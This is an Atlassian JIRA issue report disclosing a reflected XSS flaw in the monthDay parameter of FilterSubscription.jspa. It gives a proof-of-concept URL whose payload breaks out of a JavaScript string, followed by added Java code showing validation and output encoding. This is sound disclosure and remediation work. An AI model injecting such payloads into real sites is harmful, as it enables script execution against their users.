XSS in filter.subscription.prefix.monthDay parameter of /secure/FilterSubscription.jspa

2010-11-05T05:10:14
ID ATLASSIAN:JRA-22957
Type atlassian
Reporter awang@atlassian.com
Modified 2017-02-17T06:18:36

Description

http://172.16.230.130:8080/secure/FilterSubscription.jspa?filter.subscription.prefix.interval=180&groupName=jira-users&filter.subscription.prefix.runFromMins=00&nextRun=&filter.subscription.prefix.runToMins=00&filter.subscription.prefix.runToMeridian=pm&filter.subscription.prefix.week=2&filter.subscription.prefix.runOnceMeridian=pm&filter.subscription.prefix.day=2&filter.subscription.prefix.runOnceMins=5&filter.subscription.prefix.runFromMeridian=pm&filter.subscription.prefix.monthDay=1"%3balert(1)//b&subId=&atl_token=b1719c444f52dc051d1d99a5a0cc8d5b8690a864&filter.subscription.prefix.runToHours=2&lastRun=&filter.subscription.prefix.cronString=555-555-0199@example.com&Subscriure=Subscriure&filter.subscription.prefix.runOnceHours=2&filter.subscription.prefix.runFromHours=2&filterId=10000&filter.subscription.prefix.daysOfMonthOpt=dayOfWeekOfMonth&emailOnEmpty=on&filter.subscription.prefix.dailyWeeklyMonthly=daysOfWeek

The contents of filter.subscription.prefix.monthDay are passed unfiltered to the resulting page. Found by scanning and verified manually.
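
The following is an added example, not Atlassian's code or fix: it shows allow-list validation plus output encoding for a parameter like monthDay, run against the value from the URL above. It assumes the value is reflected into a double-quoted JavaScript string literal (the shape of the payload suggests this, but the page does not state it); the class and method names are hypothetical.

```java
import java.util.OptionalInt;

public class MonthDayParam {
    // Assumed sink: value concatenated into a double-quoted JS string literal.
    static String renderUnsafe(String monthDay) {
        return "var monthDay = \"" + monthDay + "\";";
    }

    // Allow-list validation: a day of month is one or two digits, 1 to 31.
    static OptionalInt parseMonthDay(String raw) {
        if (raw == null || !raw.matches("[0-9]{1,2}")) {
            return OptionalInt.empty();
        }
        int day = Integer.parseInt(raw);
        return (day >= 1 && day <= 31) ? OptionalInt.of(day) : OptionalInt.empty();
    }

    // Output encoding for a JS string literal: every character that is not an
    // ASCII letter or digit is written as a backslash-u hex escape, so quotes,
    // semicolons, slashes and angle brackets cannot end the string or the script.
    static String escapeForJsString(String s) {
        StringBuilder out = new StringBuilder();
        for (char c : s.toCharArray()) {
            boolean alnum = (c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z');
            out.append(alnum ? String.valueOf(c) : String.format("\\u%04x", (int) c));
        }
        return out.toString();
    }

    // Hardened rendering: reject anything that is not a valid day, and still
    // encode on output so the sink stays safe if validation is ever relaxed.
    static String renderSafe(String monthDay) {
        OptionalInt day = parseMonthDay(monthDay);
        if (!day.isPresent()) {
            throw new IllegalArgumentException("monthDay must be an integer from 1 to 31");
        }
        return "var monthDay = \"" + escapeForJsString(Integer.toString(day.getAsInt())) + "\";";
    }

    public static void main(String[] args) {
        String payload = "1\";alert(1)//b"; // monthDay value from the URL above, URL-decoded
        System.out.println(renderUnsafe(payload));      // raw concatenation into the literal
        System.out.println(escapeForJsString(payload)); // encoded form of the same value
        System.out.println(renderSafe("15"));           // a valid day passes validation
        System.out.println(parseMonthDay(payload).isPresent());
    }
}
```

In a real code base, a maintained encoder such as the OWASP Java Encoder's Encode.forJavaScript would replace the hand-written escaper shown here.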